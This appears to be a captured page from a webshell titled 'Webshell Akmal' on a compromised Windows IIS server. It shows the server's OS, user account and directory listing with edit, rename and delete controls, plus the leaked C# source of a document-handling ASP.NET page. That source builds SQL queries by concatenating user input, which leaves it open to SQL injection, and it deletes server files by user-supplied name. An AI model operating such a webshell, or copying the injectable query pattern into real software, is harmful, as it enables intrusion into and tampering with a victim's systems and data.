Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.IO; using wzLib; using System.Data; namespace App.prog { public partial class Fuzhiwenjian : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } protected void Button1_Click(object sender, EventArgs e) { string foldername = TextBox1.Text.ToString(); string path = Server.MapPath("../haiyun/") + foldername; if (Directory.Exists(path)) { string[] filelist = Directory.GetFileSystemEntries(path); foreach (string fileinfo in filelist) { File.Delete(fileinfo); } Directory.Delete(path); } Directory.CreateDirectory(path); string str = "select billno,docfee,docbill,docexpdeclar,docexpinvoice,docexpcontract,docimport from TR_SEAINTRANSITMSG2 where remark4='" + foldername + "'"; DataTable dt = SQLHelper.getDataTable(str); string[] fileid = new string[100]; int f_i = 0; if (dt.Rows.Count > 0) { string billno = dt.Rows[0][0].ToString(); string[] docfee = dt.Rows[0][1].ToString().Split(','); string[] docexpdeclar = dt.Rows[0][2].ToString().Split(','); string[] docexpinvoice = dt.Rows[0][3].ToString().Split(','); string[] docexpcontract = dt.Rows[0][4].ToString().Split(','); string[] docimport = dt.Rows[0][5].ToString().Split(','); for (int i = 0; i < docfee.Length; i++) { fileid[f_i] = docfee[i]; f_i = f_i + 1; } for (int i = 0; i < docexpdeclar.Length; i++) { fileid[f_i] = docexpdeclar[i]; f_i = f_i + 1; } for (int i = 0; i < docexpinvoice.Length; i++) { fileid[f_i] = docexpinvoice[i]; f_i = f_i + 1; } for (int i = 0; i < docexpcontract.Length; i++) { fileid[f_i] = docexpcontract[i]; f_i = f_i + 1; } for (int i = 0; i < docimport.Length; i++) { fileid[f_i] = docimport[i]; f_i = f_i + 1; } for (int j = 0; j < f_i; j++) { if (fileid[j].Trim().Length > 3) { string str2 = "select filename from pzupload where id=" + int.Parse(fileid[j]) + ""; DataTable dt2 = SQLite.getDataTable(str2); if (dt2.Rows.Count > 0) { string filename = dt2.Rows[0][0].ToString(); string path1 = Server.MapPath("../data/upload/") + fileid[j].Trim(); string path2 = Server.MapPath("../haiyun/") + foldername + "/" + fileid[j].Trim(); if (File.Exists(path1)) { System.IO.File.Copy(path1, path2); string path3 = Server.MapPath("../haiyun/") + foldername + "/" + filename; FileInfo fi = new FileInfo(path2); if (fi.Exists) { fi.MoveTo(path3); } } } } } string str22 = "select purorderno,docpath from bu_purorder where purorderno in(select distinct purorderno from TR_SEAPURCHASELIST where billno='" + billno + "')"; DataTable dt22 = SQLHelper.getDataTable(str22); for (int tt = 0; tt < dt22.Rows.Count; tt++) { string purorderno = dt22.Rows[tt][0].ToString(); string[] pathinfo = dt22.Rows[tt][1].ToString().Split(','); for (int dd = 0; dd < pathinfo.Length; dd++) { if (pathinfo[dd].Trim().Length > 0) { string path1 = Server.MapPath("../data/upload/") + pathinfo[dd].Trim(); string path2 = Server.MapPath("../haiyun/") + foldername + "/" + pathinfo[dd].Trim(); string str2 = "select filename from pzupload where id=" + int.Parse(pathinfo[dd]) + ""; if (File.Exists(path1)) { DataTable dt2 = SQLite.getDataTable(str2); if (dt2.Rows.Count > 0) { string filename = dt2.Rows[0][0].ToString(); System.IO.File.Copy(path1, path2); string path3 = Server.MapPath("../haiyun/") + foldername + "/" + filename; FileInfo fi = new FileInfo(path2); if (fi.Exists) { fi.MoveTo(path3); string houzhui = fi.Extension; string newname = purorderno + "-" + dd.ToString() + houzhui; string path4 = Server.MapPath("../haiyun/") + foldername + "/" + newname; FileInfo fi2 = new FileInfo(path3); if (fi2.Exists) { fi2.MoveTo(path4); } } } } } } } Label2.Text = "批次文件处理完成!"; } else { Label2.Text = "批次号未匹配!"; } } protected void Button2_Click(object sender, EventArgs e) { string allname=""; string foldername = TextBox1.Text.ToString(); string path = Server.MapPath("../haiyun/") + foldername; if (Directory.Exists(path)) { string[] filelist = Directory.GetFileSystemEntries(path); foreach (string fileinfo in filelist) { allname = allname + Path.GetFileName(fileinfo) + "</br>"; } } Label2.Text = allname; } protected void Button3_Click(object sender, EventArgs e) { string foldername = TextBox1.Text.ToString(); string filename = TextBox2.Text.ToString().Trim(); if (foldername.Length > 0 && filename.Length > 0) { string path = Server.MapPath("../haiyun/") + foldername; if (Directory.Exists(path)) { string[] filelist = Directory.GetFileSystemEntries(path); foreach (string fileinfo in filelist) { if (fileinfo.Contains(filename)) { File.Delete(fileinfo); } } } Label2.Text = "处理完成。"; } else { Label2.Text = "请输入批次号和要删除的文件名"; } } } }